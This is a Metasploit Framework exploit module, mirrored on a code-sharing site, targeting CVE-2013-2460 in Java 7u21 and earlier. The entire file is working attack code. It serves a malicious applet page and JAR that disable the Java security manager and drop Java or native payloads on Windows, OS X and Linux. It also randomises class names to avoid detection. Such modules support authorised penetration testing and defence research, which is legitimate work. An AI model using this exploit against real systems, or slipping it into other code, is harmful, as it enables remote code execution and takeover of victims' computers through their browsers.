Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb
19847 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  include Msf::Exploit::Remote::BrowserAutopwn

13
  autopwn_info({ :javascript => false })

14


15
  EXPLOIT_STRING = "Exploit"

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',

22
        'Description' => %q{

23
          This module abuses the insecure invoke() method of the ProviderSkeleton class that

24
          allows to call arbitrary static methods with user supplied arguments. The vulnerability

25
          affects Java version 7u21 and earlier.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC

30
          'Matthias Kaiser' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-2460' ],

34
          [ 'OSVDB', '94346' ],

35
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],

36
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],

37
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],

38
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]

39
        ],

40
        'Platform' => %w{java linux osx win},

41
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

42
        'Targets' => [

43
          [

44
            'Generic (Java Payload)',

45
            {

46
              'Platform' => ['java'],

47
              'Arch' => ARCH_JAVA,

48
            }

49
          ],

50
          [

51
            'Windows x86 (Native Payload)',

52
            {

53
              'Platform' => 'win',

54
              'Arch' => ARCH_X86,

55
            }

56
          ],

57
          [

58
            'Mac OS X x86 (Native Payload)',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_X86,

62
            }

63
          ],

64
          [

65
            'Linux x86 (Native Payload)',

66
            {

67
              'Platform' => 'linux',

68
              'Arch' => ARCH_X86,

69
            }

70
          ],

71
        ],

72
        'DefaultTarget' => 0,

73
        'DisclosureDate' => '2013-06-18',

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81
  end

82


83
  def randomize_identifier_in_jar(jar, identifier)

84
    identifier_str = rand_text_alpha(identifier.length)

85
    jar.entries.each { |entry|

86
      entry.name.gsub!(identifier, identifier_str)

87
      entry.data = entry.data.gsub(identifier, identifier_str)

88
    }

89
  end

90


91
  def setup

92
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "Exploit.class")

93
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

94
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "ExpProvider.class")

95
    @provider_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

96
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")

97
    @action_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

98


99
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)

100
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)

101


102
    super

103
  end

104


105
  def on_request_uri(cli, request)

106
    print_status("handling request for #{request.uri}")

107


108
    case request.uri

109
    when /\.jar$/i

110
      jar = payload.encoded_jar

111
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

112
      jar.add_file("ExpProvider.class", @provider_class)

113
      jar.add_file("DisableSecurityManagerAction.class", @action_class)

114
      randomize_identifier_in_jar(jar, "metasploit")

115
      randomize_identifier_in_jar(jar, "payload")

116
      jar.build_manifest

117


118
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })

119
    when /\/$/

120
      payload = regenerate_payload(cli)

121
      if not payload

122
        print_error("Failed to generate the payload.")

123
        send_not_found(cli)

124
        return

125
      end

126
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

127
    else

128
      send_redirect(cli, get_resource() + '/', '')

129
    end

130
  end

131


132
  def generate_html

133
    html = %Q|

134
    <html>

135
    <body>

136
    <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

137
    </body>

138
    </html>

139
    |

140
    return html

141
  end

142
end

143


144